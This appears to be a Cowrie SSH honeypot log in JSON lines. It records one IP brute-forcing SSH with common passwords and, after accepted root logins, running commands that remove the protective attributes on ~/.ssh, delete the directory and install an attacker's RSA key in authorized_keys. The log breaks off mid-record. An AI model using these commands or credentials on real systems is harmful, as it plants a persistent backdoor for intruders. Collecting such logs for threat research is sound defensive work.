{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:25.651658Z","src_ip":"212.227.235.229","session":"31ab24299c23"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:35:25.888302Z","src_ip":"212.227.235.229","session":"31ab24299c23"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:35:25.889023Z","src_ip":"212.227.235.229","session":"31ab24299c23"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:35:25.999607Z","src_ip":"212.227.235.229","session":"31ab24299c23"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:26.000502Z","src_ip":"212.227.235.229","session":"31ab24299c23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39356,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8e4cf768275","protocol":"ssh","message":"New connection: 212.227.235.229:39356 (1.2.3.4:22) [session: c8e4cf768275]","sensor":"my-vps","timestamp":"2025-09-09T01:35:27.111983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:35:27.112989Z","src_ip":"212.227.235.229","session":"c8e4cf768275"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:35:27.221988Z","src_ip":"212.227.235.229","session":"c8e4cf768275"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:35:27.696778Z","src_ip":"212.227.235.229","session":"c8e4cf768275"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:28.807857Z","src_ip":"212.227.235.229","session":"c8e4cf768275"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41454,"dst_ip":"1.2.3.4","dst_port":22,"session":"0036347578a7","protocol":"ssh","message":"New connection: 212.227.235.229:41454 (1.2.3.4:22) [session: 0036347578a7]","sensor":"my-vps","timestamp":"2025-09-09T01:35:32.601777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:35:32.602539Z","src_ip":"212.227.235.229","session":"0036347578a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:35:32.844159Z","src_ip":"212.227.235.229","session":"0036347578a7"}
{"eventid":"cowrie.login.failed","username":"hunter","password":"Password123","message":"login attempt [hunter/Password123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:35:33.851660Z","src_ip":"212.227.235.229","session":"0036347578a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39370,"dst_ip":"1.2.3.4","dst_port":22,"session":"a500fc63a4af","protocol":"ssh","message":"New connection: 212.227.235.229:39370 (1.2.3.4:22) [session: a500fc63a4af]","sensor":"my-vps","timestamp":"2025-09-09T01:35:34.021415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:35:34.022100Z","src_ip":"212.227.235.229","session":"a500fc63a4af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:35:34.130022Z","src_ip":"212.227.235.229","session":"a500fc63a4af"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:35:34.596489Z","src_ip":"212.227.235.229","session":"a500fc63a4af"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:34.704862Z","src_ip":"212.227.235.229","session":"a500fc63a4af"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:34.705846Z","src_ip":"212.227.235.229","session":"31ab24299c23"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:35.098476Z","src_ip":"212.227.235.229","session":"0036347578a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59202,"dst_ip":"1.2.3.4","dst_port":22,"session":"f78a64c171b8","protocol":"ssh","message":"New connection: 212.227.235.229:59202 (1.2.3.4:22) [session: f78a64c171b8]","sensor":"my-vps","timestamp":"2025-09-09T01:35:48.997851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:35:48.998774Z","src_ip":"212.227.235.229","session":"f78a64c171b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:35:49.118245Z","src_ip":"212.227.235.229","session":"f78a64c171b8"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"111111","message":"login attempt [testuser/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:35:49.636513Z","src_ip":"212.227.235.229","session":"f78a64c171b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45965,"dst_ip":"1.2.3.4","dst_port":22,"session":"341361806f69","protocol":"ssh","message":"New connection: 212.227.235.229:45965 (1.2.3.4:22) [session: 341361806f69]","sensor":"my-vps","timestamp":"2025-09-09T01:35:49.820826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:35:49.821634Z","src_ip":"212.227.235.229","session":"341361806f69"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:35:50.057598Z","src_ip":"212.227.235.229","session":"341361806f69"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:50.758037Z","src_ip":"212.227.235.229","session":"f78a64c171b8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123qweASD","message":"login attempt [admin/123qweASD] failed","sensor":"my-vps","timestamp":"2025-09-09T01:35:51.040032Z","src_ip":"212.227.235.229","session":"341361806f69"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:52.278521Z","src_ip":"212.227.235.229","session":"341361806f69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47276,"dst_ip":"1.2.3.4","dst_port":22,"session":"23233a1ad206","protocol":"ssh","message":"New connection: 212.227.235.229:47276 (1.2.3.4:22) [session: 23233a1ad206]","sensor":"my-vps","timestamp":"2025-09-09T01:35:52.395188Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:35:52.396057Z","src_ip":"212.227.235.229","session":"23233a1ad206"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:35:52.660315Z","src_ip":"212.227.235.229","session":"23233a1ad206"}
{"eventid":"cowrie.login.failed","username":"butter","password":"12345","message":"login attempt [butter/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T01:35:53.945700Z","src_ip":"212.227.235.229","session":"23233a1ad206"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:55.251187Z","src_ip":"212.227.235.229","session":"23233a1ad206"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40258,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1c9b2f5228a","protocol":"ssh","message":"New connection: 212.227.235.229:40258 (1.2.3.4:22) [session: a1c9b2f5228a]","sensor":"my-vps","timestamp":"2025-09-09T01:36:05.837490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:36:05.840229Z","src_ip":"212.227.235.229","session":"a1c9b2f5228a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:36:06.068755Z","src_ip":"212.227.235.229","session":"a1c9b2f5228a"}
{"eventid":"cowrie.login.success","username":"root","password":"fabregas","message":"login attempt [root/fabregas] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:36:06.977753Z","src_ip":"212.227.235.229","session":"a1c9b2f5228a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:36:07.481436Z","src_ip":"212.227.235.229","session":"a1c9b2f5228a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:36:07.482092Z","src_ip":"212.227.235.229","session":"a1c9b2f5228a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:36:07.483080Z","src_ip":"212.227.235.229","session":"a1c9b2f5228a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:36:07.712231Z","src_ip":"212.227.235.229","session":"a1c9b2f5228a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:36:08.228484Z","src_ip":"212.227.235.229","session":"a1c9b2f5228a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:36:08.229353Z","src_ip":"212.227.235.229","session":"a1c9b2f5228a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:36:08.461109Z","src_ip":"212.227.235.229","session":"a1c9b2f5228a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:36:08.462179Z","src_ip":"212.227.235.229","session":"a1c9b2f5228a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55000,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0d267b6154e","protocol":"ssh","message":"New connection: 212.227.235.229:55000 (1.2.3.4:22) [session: e0d267b6154e]","sensor":"my-vps","timestamp":"2025-09-09T01:36:08.693451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:36:08.695151Z","src_ip":"212.227.235.229","session":"e0d267b6154e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-